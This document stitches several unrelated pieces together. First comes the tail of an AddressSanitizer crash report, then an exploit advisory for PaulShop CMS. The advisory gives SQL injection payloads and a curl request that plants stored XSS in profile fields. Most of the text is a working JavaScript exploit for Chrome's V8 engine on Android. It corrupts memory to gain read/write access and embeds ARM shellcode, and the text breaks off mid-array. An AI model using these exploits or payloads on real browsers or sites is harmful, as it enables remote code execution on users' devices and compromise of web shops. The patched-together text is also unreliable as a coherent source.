Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==728==ABORTING
-->
# Exploit Title: PaulShop CMS - Sql Injection and stored XSS
# Date: 07/23/2017
# Exploit Author: BTIS Team (http://www.btis.vn)
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: 03/27/2017
# Tested on: Apache/2.4.7 (Ubuntu)
# Contact: research@btis.vn
# Can not contact vendor
1. Description
- SQL Injection on Search page with "q" parameter (GET)
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]
2. Examples
- SQL injection:
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]
# Payload: - True condition: europe' and 1=1)-- -
- False condition: europe' and 1=0)-- -
- Stored XSS:
# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
# curl -X POST \
'http://localhost/shop/en/account?save=1' \
-H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
-b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
-d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save'
Quan Minh Tâm / Trưởng phòng kỹ thuật
<mailto:tamqm@btis.vn> tamqm@btis.vn / 01284 211 290
CÔNG TY CÔNG NGHỆ BẢO TÍN
028 3810 6288 – 028 38106289
5A Trần Văn Dư, phường 13, quận Tân Bình, Tp.Hồ Chí Minh
<http://www.btis.vn> www.btis.vn
Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard.
Để biết thêm thông tin, hãy truy cập www.bullguard.com <http://www.bullguard.com/tracking.aspx?affiliate=bullguard&buyaffiliate=smtp&url=/>
<html>
// Source: https://github.com/secmob/pwnfest2016/
<script>
function exploit(){
function to_hex(num){
return (num>>>0).toString(16);
}
function intarray_to_double(int_arr){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
uBuf[0]=int_arr[0];
uBuf[1]=int_arr[1];
return dBuf[0];
}
function str_to_double(str){//leng of str must be 8
var dBuf = new Float64Array(1);
var u8Buf = new Uint8Array(dBuf.buffer);
for(var i=0;i<str.length;i++){
u8Buf[i] = str.charCodeAt(i);
}
return dBuf[0];
}
function double_to_array(value){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
dBuf[0]=value;
return uBuf;
}
function gc(){
for(var i=0;i<0x100000/16;i++){
new String;
}
}
function getHiddenValue(){
var obj = {};
var oob = "/re/";
//oob = oob.replace("re","*".repeat(0x2000));
oob = oob.replace("re","*".repeat(0x100000));
var str = 'class x extends Array{'+oob+"}";
var fun = eval(str);
Object.assign(obj,fun);
return obj;
}
var obWin;
function makeOobString(){
var hiddenValue = getHiddenValue();
var magicStr = "bbbb";
var arr=[];
var str = 'class x extends Array{}';
for(var i=0;i<str.length;i++){
arr[i]=str.charCodeAt(i);
}
var ob = new Array(0x200);
ob.fill(0x31313131);
gc();
gc();
str=String.fromCharCode.apply(null,arr);
ob=ob.concat(0x32323232);
var fun = eval(str);
ob[2]=str;
ob[3]=ob;
Object.assign(fun,hiddenValue);
var oobString = fun.toString();
gc();
gc();
print("begin search");
var subStr = oobString.substr(0,0x8000);
var pos = subStr.indexOf(magicStr);
print("end search");
if(pos==-1){
print("find magic failed");
postMessage(false);
self.close();
print("unpossible");
throw "error";
}else{
print("find magic at "+pos);
}
oobString = oobString.substr(pos,ob.length*4);
obWin=ob;
return oobString;
}
var oobString = makeOobString();
print("get oob string successfully");
function print(){
console.log.apply(null,arguments);
/*document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");*/
}
function str2arr(str,len){//len must be multile of 4
if(len===undefined)
len = str.length;
var u8a = new Uint8Array(len);
for(var i=0;i<len;i++){
u8a[i] = str.charCodeAt(i);
}
return new Uint32Array(u8a.buffer);
}
function pArrayInHex(arr){
var result="<p style='font-size:8px'>";
for(var i=0;i<arr.length;i++){
result+=(arr[i]+0x100000000).toString(16).substr(-8);
result+=" ";
if(i%8==7)
result+="<p style='font-size:8px'>";
}
result+="<p>";
print(result);
//alert(result);
return result;
}
function pStrInHex(str){
//var result="<p style='font-size:8px'>";
var result="\n";
for(var i=0;i<str.length;i++){
var code = str.charCodeAt(i);
result+=(code+0x100).toString(16).substr(-2);
if(i%4==3)
result+=" ";
if(i%32==31)
// result+="<p style='font-size:8px'>";
result+="\n";
}
// result+="<p>";
result+="\n";
print(result);
return result;
}
function getObjAddr(obj){
obWin[0]=obj;
var value2= ((str2arr(oobString,4))[0]);
return value2>>>0;
}
var getObj24BitsAddr = function(){
var smi=0;
var code = 0;
var i=0;
//don't allocate heap object
function getAddr(obj){
obWin[0]=obj;
value=0;
code = 0;
i=0;
for(i=2;i>=0;i--){
code = oobString.charCodeAt(i);
value = code+value*256;
}
return value;
}
return getAddr;
}();
var lengthInOldSpace = 0xfffffffc;
var abarr=new Array(800);
function sprayVM(){
var i=0;
var j=0;
try{
for(i=0;i<20;i++){
var u8 = new Uint8Array(0x10000000-0x500);
abarr[i]=u8;
}
}catch(e){}
try{
for(j=0;j<100;j++){
var u8 = new Uint8Array(0x8000000-0x500);
abarr[i+j]=u8;
}
}catch(e){}
print("allocate "+i+" 256M "+j+" 16M ")
function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}
delete abarr[getRandomInt(0,i)];
}
function getNewSpaceAddrs(){
/*var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";*/
var objsInNewSpace = new Array(80);
for(var i=0;i<objsInNewSpace.length;i++){
//var xx=escape(str);
var xx = new Array(0x70000/4);
objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;
//使newspace更离散
new Uint8Array(0x100000-0x500);
new Uint8Array(0x100000-0x500);
}
function compareNumbers(a, b) {
return a - b;
}
objsInNewSpace = Array.from(new Set(objsInNewSpace));
objsInNewSpace = objsInNewSpace.sort(compareNumbers);
return objsInNewSpace;
}
print("begin get new space address");
var objsInNewSpace = getNewSpaceAddrs();
while(objsInNewSpace.length<16){
objsInNewSpace = getNewSpaceAddrs();
print("new space addresses");
pArrayInHex(objsInNewSpace);
}
try{
sprayVM();
}catch(e){}
var selectedTrunk = 0;
var selectedStr = "";
function bruteForceFengShui(){
var huge_str = "x".repeat(0x100000-0x9000);//-0x9000
huge_str +="%";
var hold = new Array(100);
//var holdaddress = new Array(100);
for(var i=0;;i++){
var large = escape(huge_str);
var addr = getObjAddr(large);
//console.log(addr.toString(16) + " "+i);
if(i<hold.length){
hold[i]=large;
//holdaddress[i]=addr;
}
addr=(addr&0xfff00000)>>>0;
addr = addr-0x100000;
if(objsInNewSpace.indexOf(addr)!=-1){
selectedTrunk = addr;
selectedStr = large;
abarr.fill(1);
hold.fill(1);
//holdaddress.fill(1);
break;
}
if(i===150){
/*i=0;
print("tried 200 times");
abarr.fill(1);
try{
sprayVM();
}catch(e){};*/
postMessage(false);
close();
throw "exceed limits";
}
}
}
bruteForceFengShui();
//to avoid allocate memory latter, initilize here
var nextTrunk = selectedTrunk + 0x100000;
//生成一块足够大的可读写内存
var huge_str = "eval('');";
//8000不能太大,太大会使new_space增大
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
function fillNewSpace(origObj){
//first object in new space at 0x8100, new spaces layout
//0x40000
//0x37f00
//.....
//0x40000
var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25
var gap = gap+"%";
//flat gap
gap.substr(0,100);
var fillstr = "%20a".repeat((0x40000-12)/4);
fillstr = escape(fillstr);
var addr=0;
for(var i=0;i<0x100;i++){
addr = getObj24BitsAddr(origObj);
if((addr&0xfffff)===0x8101)
origObj=escape(gap);
else
origObj=unescape(fillstr);
}
}
function findNewSpace(){
var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";
for(var i=0;;i++){
var xx=escape(str);
var straddr = getObjAddr(xx);
addr=(straddr&0xfff00000)>>>0;
if(addr===selectedTrunk){
print("good state "+straddr.toString(16));
break;
}
}
}
function myencode(str){
var arr = [];
for(var i=0;i<str.length;i++){
if(i%2==1)
arr.push(str.charCodeAt(i));
else{
arr.push(37);//%
var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);
arr.push(hexstr.charCodeAt(0));
arr.push(hexstr.charCodeAt(1));
}
}
return String.fromCharCode.apply(null,arr);
}
var dArray = [];
var index = (0x8100-36)*2;
for(var i=0;i<0x20000/8;i++){
dArray[i]=str_to_double("%03x%03x");
}
var occulen = 0;
var i = 0;
var savedChunk = new Uint8Array(0x8100);
var hiddenValue = getHiddenValue();
var arr=[];
fillNewSpace(new String);
findNewSpace();
var classStr = 'class x extends Array{}';
for(var i=0;i<classStr.length;i++){
arr[i]=classStr.charCodeAt(i);
}
var magicStr = String.fromCharCode(0x86,0x24);
classStr=String.fromCharCode.apply(null,arr);
var ab = new ArrayBuffer(0x1243);
var fun = eval(classStr);
Object.assign(fun,hiddenValue);
var oobStr = fun.toString();
/*(gdb) x/20xw 0x5600c45c array buffer layout
* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020
* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000
*/
//overwrite huge string as array buffer
var abLengthIndex = oobStr.indexOf(magicStr);
var strArrayBuffer = oobStr.substr(abLengthIndex-12,32);
//replace the byteLength
var LengthAddr = getObjAddr(lengthInOldSpace);
var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);
var strBase = "\x00\x00\x00\x00";
strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);
strArrayBuffer = myencode(strArrayBuffer);
for(var i=0;i<strArrayBuffer.length/8;i++){
var d = strArrayBuffer.substr(i*8,8);
dArray[index/8+i] = str_to_double(d);
}
var classStrAddr = getObjAddr(classStr)>>>0;
//set read position
var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head
//length control the length of unscaped string, generated string has 12 bytes head
//left 0x1000*2 bytes to avoid gc
var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);
//save the the chunk head to be corrupted
var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;
var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);
for(var i =0;i<savedThunkStr.length;i++){
savedChunk[i] = savedThunkStr.charCodeAt(i);
}
var pos1=new String;
var pos1addr = getObj24BitsAddr(pos1)-1;
//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray
occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);
//minus the length of double array
if(occulen<0x40000+16+8)
throw "no enough room";
occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray
if(occulen%4!==0)
throw "length don't align";
var arrocc=new Array((occulen/4));
//set unescape write position
var occDoubleArray = dArray.concat();
var b=unescape(subOobStr);
//restore the corrupted chunk head
var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);
for(var i=0;i<savedChunk.length;i++){
u8[i] = savedChunk[i];
}
print("long string allocated at "+classStrAddr.toString(16));
if(typeof(selectedStr)==="string"){
print("overwrite failed");
postMessage(false);
close();
return;
//throw "overwrite failed";
}
var fakeab = selectedStr;
print("faked array buffer byte length is "+fakeab.byteLength.toString(16));
var globaldv = new Uint32Array(fakeab);
function read_uint32(from_address){
var u32 = globaldv[(from_address/4)>>>0];
return u32>>>0;
}
function read_uint8(from_address){
from_address = from_address>>>0;
var index = (from_address/4)>>>0;
var mask = from_address%4;
var u32 = globaldv[index];
u32 = u32<<8*(3-mask);
return u32>>>24;
}
function read_uint32_unalign(from_address){
var u32 = 0;
for(var i=3;i>=0;i--){
var u8 = read_uint8(from_address+i);
u32 = u32*0x100+u8;
}
return u32>>>0;
}
//rw to execute
//get function point of v8::internal::Accessors::ReconfigureToDataProperty
function getFixedFunctionPoint(fakeab){
var FunctionAddress = getObjAddr(Function);
var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);
var map = u32[0];
u32 = new Uint32Array(fakeab,map-1,0x1000);
//instance descriptors
var descriptors = u32[7];
u32 = new Uint32Array(fakeab,descriptors-1,0x1000);
var lengthAccessorInfo = u32[6];
u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);
var setterForeign = u32[4];
u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);
var functionPoint = u32[1];
return functionPoint-1;
}
var funPoint = getFixedFunctionPoint(fakeab);
print("ReconfigureToDataProperty at"+funPoint.toString(16));
var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000
print("chrome.apk base at "+point.toString(16));
function find(startAddr,len,pattern){
for(var i=0; i<(len-pattern.length); i++ ) {
for(var j=0;j<pattern.length;j++){
var temp = read_uint8(startAddr+i+j);
//print(temp.toString(16));
if(temp!=pattern[j]) break;
}
if(j==pattern.length) return startAddr+i;
}
print("find failed");
}
var pattern_position=find(point,0x10000000,pattern);
print("find pattern at "+to_hex(pattern_position));
function get_dest_from_blx(addr) {
var val = read_uint32_unalign(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
function backup_original_code(start_address){
var backup_arr = [];
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=u8arr[i];
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
set_access_address(start_address);
var u8arr=new Uint8Array(faked_ab);
for(var i=0;i<shellcode.length+4096;i++){
u8arr[i]=backup_arr[i];
}
}
huge_func({});
print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4)));
var dlsym_addr = get_dest_from_blx(pattern_position-4);
print("dlsym address is "+to_hex(dlsym_addr));
var huge_func_address = getObjAddr(huge_func)-1;
print("huge func address is "+to_hex(huge_func_address));
for(var i=0;i<20;i++){
print(to_hex(read_uint32(huge_func_address+i*4)));
}
var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4
print("huge func code entry is "+to_hex(huge_func_code_entry));
print(to_hex(read_uint32(huge_func_code_entry)));
//var so_str= "";
var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0